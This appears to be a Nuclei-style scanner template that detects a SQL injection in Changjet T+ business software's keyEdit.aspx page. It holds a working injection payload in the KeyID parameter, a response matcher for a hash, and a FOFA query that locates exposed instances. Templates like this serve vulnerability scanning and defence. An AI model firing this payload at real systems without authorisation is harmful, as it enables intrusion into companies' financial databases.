id: changjet-tplus-keyedit-sqli

info:
  name: Changjet Tplus KeyEdit SQL Injection
  author: Co5mos
  severity: critical
  description: |
    畅捷通 T+ keyEdit.aspx 存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库权限。畅捷通 T+ 是一款基于互联网的新型企业管理软件，功能模块包括：财务管理、采购管理、库存管理等，主要针对中小型工贸和商贸企业的财务业务一体化应用。
  metadata:
    fofa-query: 'app="畅捷通-TPlus"'
  tags: 畅捷通-TPlus

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(SELECT+sys.fn_varbintohexstr(hashbytes('MD5'%2C'999999999')))%20--&preload=1"

    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"